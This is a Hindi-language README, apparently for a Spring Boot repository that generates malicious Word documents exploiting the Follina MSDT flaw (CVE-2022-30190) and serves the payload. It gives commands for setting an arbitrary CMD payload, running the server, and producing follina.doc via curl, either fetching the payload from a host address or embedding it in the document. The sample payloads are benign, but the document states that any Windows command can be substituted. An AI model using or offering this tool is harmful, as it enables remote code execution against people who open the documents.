
Follina पेलोड को होस्ट/एक्टिवेट करने के लिए सर्वर और MS-MSDT प्रोटोकॉल का शोषण करने वाले दुर्भावनापूर्ण Word दस्तावेज़ों का जनरेटर। (CVE-2022-30190)
इस रिपॉजिटरी में एक सरल Spring Boot एप्लिकेशन है जो Follina पेलोड को होस्ट/एक्टिवेट करने के लिए सर्वर के रूप में और दुर्भावनापूर्ण Word दस्तावेज़ों के जनरेटर के रूप में कार्य करता है, जो CVE-2022-30190 का शोषण करने के लिए आक्रमण वेक्टर के रूप में उपयोग के लिए तैयार हैं।
इस कमजोरी में MSDT (Microsoft Windows Support Diagnostic Tool) के माध्यम से रिमोट कोड निष्पादन शामिल है।
अपनी पसंद का एक विशेष पेलोड प्रस्तुत करने के लिए, आपको चाहिए:
export FOLLINA_PAYLOAD="notepad.exe"
mvn spring-boot:run
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc
यदि आप वर्तमान पेलोड को बदलना चाहते हैं, तो आपको पहले वर्तमान में सक्रिय सर्वर को बंद करना होगा, और नए पेलोड को परिभाषित करने के बाद चरणों को दोहराना होगा।
नोट: पेलोड को किसी भी अन्य कमांड से बदला जा सकता है, जब तक कि इसे Windows CMD के माध्यम से चलाया जा सके।
अपनी पसंद का क्लाइंट-साइड पेलोड प्रस्तुत करने के लिए, आपको चाहिए:
mvn spring-boot:run
cmd क्वेरी पैरामीटर निर्दिष्ट हो, उदा.:curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc
इस मामले में पेलोड दस्तावेज़ के भीतर एम्बेडेड है, और सर्वर से संपर्क करके केवल सक्रियण की आवश्यकता होगी। इस तरह, आप अलग-अलग दस्तावेज़ों में फैले कई अलग-अलग पेलोड रख सकते हैं और पेलोड परिवर्तनों को ट्रिगर करने के लिए आपको सर्वर को रिबूट नहीं करना पड़ेगा - क्योंकि आप बस वांछित पेलोड के साथ एम्बेडेड एक नया दस्तावेज़ उत्पन्न कर सकते हैं।
John Hammond को बहुत-बहुत धन्यवाद जिन्होंने Python कार्यान्वयन तैयार किया और CVE का अपना विश्लेषण साझा किया।